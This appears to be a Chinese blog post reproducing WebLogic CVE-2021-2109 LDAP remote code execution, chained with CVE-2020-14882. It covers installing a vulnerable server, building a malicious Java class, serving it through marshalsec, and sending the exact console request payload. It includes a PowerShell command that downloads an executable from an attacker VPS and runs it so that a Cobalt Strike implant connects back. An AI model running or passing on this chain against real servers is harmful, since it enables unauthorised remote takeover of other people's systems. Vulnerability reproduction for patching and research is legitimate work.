weblogicCVE-2021-2109ldap远程代码执行漏洞复现(从weblogic环境搭建到...

环境搭建 参考: https://blog.csdn.net/zhlh_xt/article/details/76436807 下载链接: https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html http...

环境搭建

参考:

https://blog.csdn.net/zhlh_xt/article/details/76436807

下载链接:

https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html

https://www.oracle.com/java/technologies/javase/javase7-archive-downloads.html

开始安装:

| Java -D64 -jar wls1036_generic.jar |

| C:\Oracle\Middleware?projects\domains |
设置密码

搭建完毕

访问目标:

漏洞复现

准备工作:

ldap包下载 https://github.com/RandomRobbieBF/marshalsec-jar/archive/master.zip
构造java包进行编译:Request.java

如想上线CS把calc.exe修改为下载cs木马并执行命令

cd https://www.freebuf.com/Windows/Temp && powershell (new-object System.Net.WebClient).DownloadFile('http://vps/123.jpg','evil.exe') & evil.exe

进行编译:注意目标环境是什么jdk就用什么jdk版本进行编译

编译好class包后上传到vps

开启http服务,下面放编译好的class包

用下载好的marshalsec包开启ldap服务:

通过burp请求:配合
CVE-2021-2109(ldap远程代码执行)和CVE-2020-14882(未授权访问)

完整数据包:

_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22;ldap://vps:5005/Request;AdminServer%22) |

cs接收shell

限制条件:目标可以出网,能够成功构造和发送包

  • 发表于 2021-05-01 07:30
  • 阅读 ( 396 )
  • 分类:互联网

0 条评论

请先 登录 后评论
人民网
人民网

744 篇文章

你可能感兴趣的文章

相关问题